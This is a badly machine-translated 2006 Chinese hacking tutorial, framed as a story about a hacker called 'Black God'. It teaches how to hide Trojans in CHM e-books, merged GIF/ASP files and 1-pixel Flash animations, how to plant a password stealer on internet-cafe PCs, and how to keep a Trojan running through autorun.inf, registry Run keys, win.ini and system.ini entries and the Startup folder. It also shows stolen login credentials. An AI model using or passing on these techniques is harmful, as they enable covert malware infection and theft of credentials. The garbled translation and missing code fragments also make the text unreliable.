Hack ultimate case of the Black God five law Secret line Arena-vulnerability warning-the black bar safety net

ID MYHACK58:62200610635
Type myhack58
Reporter 佚名
Modified 2006-07-23T00:00:00


Inclusive of all things the night is full of mystery......

At night is the hackers of the world, because the evening Internet, the Internet speed was fast, coupled with the webmaster spiritually LAX. Due to various reasons, have staged a lot of this shouldn't have happened......

1 2 o'clock sharp, dressed in Black the Black God once again quietly through the cafe appeared in the Internet, began the night five big secret operations......

The first scene in the book its own little horse

The Black God's Toolbox filled with all kinds of novelty black soft, wherein the Theef(Figure 1)* is a strong function of the welding of DLL Trojans. The Trojans have a custom insertion system processes, File Management, Process Management, window management, record keyboard related operations, using DOS command control and the preparation of BAT, VBS, run, point-to-point chat, screen capture, screen control, and a whole bunch of prank function.



Black God from the Toolbox to remove Trojan Theef with the Microsoft HTML HELP Workshop v1. 3 2 E-book production tool. Then, from the Internet to download the chm format e-book the flirting of the autumn fragrance of the classic white on(as shown in Figure 2)****。 Man is a bubble MM for the pleasure, the dark God is no exception.^-^black God opened the flirting of the autumn fragrance of the classic white e-book, in the subsequent pop-up the main window blank with the right mouse button click, select“Properties”, 获知其网址链接为mk:@MSITStore:C:\WINNT\system32\唐伯虎点秋香之经典对白.chm::/唐伯虎点秋香之经典对白 the. Then, the Black God just create a new text file, enter the following code:

| The following is quoted fragment:

After completion, save it as MM. htm a web page file. Do a deep call information, the Black God start the installed Microsoft HTML HELP Workshop tool, select the menu item“File menu”→“interpreted”it. From find C:\WINNT\system32\flirting with the point of the autumn fragrance of the classic white e-book path, the Save path is changed to E:\hack it. Then, the Trojan client file Server210. exe drag-and-drop to. Thereafter a new text file, input the following content:

The following is quoted fragment:

[OPTIONS] Compatibility=1.1 Or later Compiled file=Cliconf. chm Default Window=Main Language=0x804 Chinese(China) [WINDOWS] Main="SQL Server Client Network Utility is what?"," Flirting with the point of the autumn fragrance of the classic on. hhc","flirting autumn fragrance of the classic on. hhk","mm.htm",,,,,, 0x420,1 5 0,0x104e,,0x0,0x0,,,,,0 [Files] mm.htm Server210.exe

Input after the completion of the file named mm. hhp, and stored in E:\hack folder. Then in the Microsoft HTML HELP Workshop, open the mm. hhp, select Save All files and compile. Close the program after entering to the E:\hack directory, black God made a beautiful response means, e-book the Trojan turned out!

Black God immediately entrained in the Trojans landing already registered with the Network Hard Disk the Space Station, build a directory of the primary Tiger name for the action. Then upload the compiled Trojan e-book to the directory they sit there. As long as people download this e-book, that he will be free to get a pony! The second act cafe Trojan secretly installed

Black God just upload the finished e-book Trojan horse, suddenly heard the cafe inside came a burst of noisy voice:“boss, give a few of these machines, we want to play legend”.“ It is a help to play the online game guy,”the boss whispered drops put the sentence...... Hey, how to put this thing to forget. The Black God's face is exposed a hint of a Ghost Secret smile, quickly see a bit of cafe management system. Decided to use a Trojan of password stammer 4. 1 0(as shown in Figure 3)***,This is the legendary good stuff, you can capture Windows 9X/2 0 0 0/XP system, almost all common Windows and web login password, as well as a variety of online games password. The Trojan is the most practical that can't be any anti-virus software intercepted, be able to successfully hide from antivirus memory Avira osmosis technology.


In the installation password stammer before you have to ban damn the Restore Wizard, so the Black God immediately come up with black soft restore shift register master(as shown in Figure 4)****。 The tool can not destroy the Restore Wizard to install any software, even if you restart the computer after the installation of the file will still exist. Black God first from the network will be Trojans downloaded to the machine. 然后 在 需要 转 存 的 EXE 里 输入 木马 的 本 机 地址 c:\winnt\ 木马 .exe the. Thereafter, 黑神在需要转存的木马地址中选择c:\winnt\system32\木马.exe and modify the icon. Finally, select Save and double-click the program allows the Trojan to start running......


Not for a moment Kung Fu, the Black God received the following e-mail:

Number:0 0 0 1 time:2005-3-12 2 0:2 6:0 3 Thursday-------- 0 0 0 8 0 5 3 4(380,130): 4 5 7 4 8 7 9 5: QQ user login-> Prompt box: the user number: Selection box: 15663xx Prompt box: user password: Password box: 1 3 1 4 2 Prompt box: the application password protection, to ensure that number safe Number:0 0 0 2 time:2005-3-12 2 0:2 9:1 0 Thursday-------- 001805ae(415,558): Outlook Express - main identity: Internet account: hc_zhang01@163.com properties of the server-> Prompt box: the server information Prompt box: the outgoing mail server Input box: pop.163.com Message box: send mail(SMTP)(&U): Input box: smtp.163.com Prompt box: account name(&C): Input box: XXXXx011 Tips box: password(&P): Password box:*88803

Black gods got up to the cashier and bought a pack of cigarettes, by the way glanced at the network's face, at the same time in want him to die tomorrow was sure to be ugly......

The third act of the picture the Trojan dessert

“TMD, a few days before a netizen said to me a MM picture to see, the results open up that picture, the computer stick was mixed body of the virus......” Black God in the back seat when heard this remark, mind Suddenly have a“wisdom of light”flashed. As remanufacturing a picture of the Trojan horse Mercedes-Benz in the network, to the online crawlers are an unexpected surprise! Said dry is dry, the Black God immediately began to create a picture entrained Trojan environment. Picture of the Trojan horse principle it is with two pieces of code combined, and unpack.

Black God from the first network and download ice Fox prodigal asp, and then the client name suffix changed to“*. gif”, and the use of fault-tolerant format: the. Thereafter, create a new ASP file. Enter in code: and save as“ASP.gif”file. So far, this is pictures ASP file is the Trojan and you're done.

Black God whistled began to merge Double files. The first“ASP.gif”the suffix of the name change the“ASP. ASP”is. Then downloaded from the network a pair of beautiful MM in the image(as shown in Figure 5)***,将 其 命名 为 mm.gif placed in the E drive of the HACK folder. Thereafter, bring up the command prompt, enter the command:e:\hack\copy mm.gif /b + asp. asp /a GG.gif the. Now, the system has generated a file called GG. gif image Trojan.


Next black God begin to consider how the Trojan is uploaded to the network. With, you can use the BBS to Upload picture function. So straight to the BBS, register a new user and log in. Enter the appropriate section after the Black God chose to publish a new post, this patch is named as“must see”, and then the picture of the Trojan uploaded. In the submission of Postings after the next just waiting for all viewers to get caught. Hey Hey!

The fourth screen of the Flash Trojan the crisis

Music from the Black God of the headphones sounded, melodious voice again triggered the Black God's inspiration. Why can I not reproduce a Flash animation Trojans, let the viewer off guard. Flash Trojan works as follows:When the user browse the embedded Flash animation of the malicious Web page, A Trojan or a virus will vary with the Flash automatically is download execute, and then control the other machine or steal their passwords.

Black God began to roll the sleeves hands-on, open Flash MX, select Create a new Flash file. Then view the interface of the lower end of the“Properties”panel, click“size”button in the popup“Document Properties”dialog box, set its width and height to 1PX minimum. Thereafter, the Black God the animation bar, select“action”→“actions”, the 在 getURL 中 输入 木马 路径 :http:\\www.xxxx.net the. Finally, the output file and generate the Flash animation.

Hey, the following is necessary to find a suckers site and upload just the production of the Flash animation. Into http://www. xxx. 3bbs. com register a new user, then post submit the Flash animation. Thus, once there is a“daredevil”opens this page, then his machine will be in the background while the download Trojan. Each other if you pay attention to view the process list, simply can not know the machine is in a Trojan. In addition, you can also use the QQ will Flash immediately sent to friends(Figure 6)*


The fifth screen of the classic web Trojan

Black God in the production of the finished Flash animated Trojan horse, and think the IE is not also storm out of a lot of vulnerabilities? Then use IE's own vulnerability to write a web page Trojan. When users browse using IE's own vulnerability to write a web page, the registry is the modification of a mess, and the IE title, home, etc. will also be altered, the Registry Editor will be disabled...... Those are Web Trojan masterpiece. Black God intends to prepare a web page, so that users in the Browse, specify the page that will automatically open the hard disk share.

The preceding code is as follows:

When the entry is complete save for the GG. htm file, upload to the cyberspace. A compact web page Trojan horse in this regard. The Black God produced this Trojan horse immediately after to go to 1 6 3 Application a domain name of the conversion:http://www. XXXX. net, which is connected to the destination address. When users browse this page, his C drive it will be shared. Trojan since the start of the five law

Black God suddenly feel that this knife can kill people also can save people. Some hackers only know the remote into the other computer on the horse, but don't have those methods will allow the Trojan to run. This horse if not active, that is a dead horse, useless. So decided to write to sell the Trojan activities of a few trick must learn.

The first trick is the use of Autorun. inf

In the text file enter the following content:

The following is quoted fragment:

[AUTORUN] open= 木马 .exe

Then save as Autorun. inf, then it and the Trojan Server piece is placed in the target machine to any drive's root directory. Because the Windows system after startup will automatically find each disk in the root directory of the Autorun. inf. Once you find this file, the system will automatically run the Setup program.

The second trick is the use of the registry

Many hackers are aware, with the Windows auto-run program, mostly in the registry added since the start of the item. Accordingly, it can be a Trojan add in the registry. For example, the target host Trojan service end is placed in the E disk. You can create a new text file, enter the following:

The following is quoted fragment:

REGEDIT 4 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "Error"="e:\\ 木马 .exe"

Then, save it as arun. reg registry file. And then create a text file, enter:

The following is quoted fragment:

[autorun] open=regedit/s arun. reg

Save the file as autorun. inf. Thereafter the Trojan end with just the two new files together into the target host's hard disk root directory can be. The other side of the computer after the first start it will be the Trojan added to the registry, when the second restart, you can activate the Trojan.

The third trick is the use of the win. ini

win. ini file in the Windows 9 8 system is located in the c:\windows directory;in Windows 2 0 0 0 and Windows XP system at c:\winnt directory. Use Notepad to open the target host of the win. ini file, the write from the start command:

The following is quoted fragment:

[windows] load=c:\winnt\ 木马 .exe

Then exit and save. Thereafter, the ready to the Trojan end is placed into the c:\winnt directory. As long as the other side of the computer is first restarted, the Trojan will immediately be activated.

The fourth trick is the use of the system. ini

The method and on the method with the same purpose. system. ini file in the Windows 9 8 is located in the c:\windows directory;in Windows 2 0 0 0 and Windows XP system in the c:\windows directory. Use Notepad to open the target host system. ini file to write since the start of the command:

The following is quoted fragment:

[book] shell=EXPlorer.exe c:\winnt\ 木马 .exe

Save and exit. Thereafter will be ready for the Trojan end into the c:\winnt directory. The target host for the first time after the restart, will be immediately and automatically execute the Trojan.

The fifth trick is the use of the startup group

In the target host, enter system disk"Documents and Settings\Administrator\Start Menu\Programs\Startup", the Trojan service end is placed in the directory. Then, the file attribute is set to hidden, then in the system settings do not show hidden files and folders.

Strive to make every hack have become on the horse and the horse hotshot......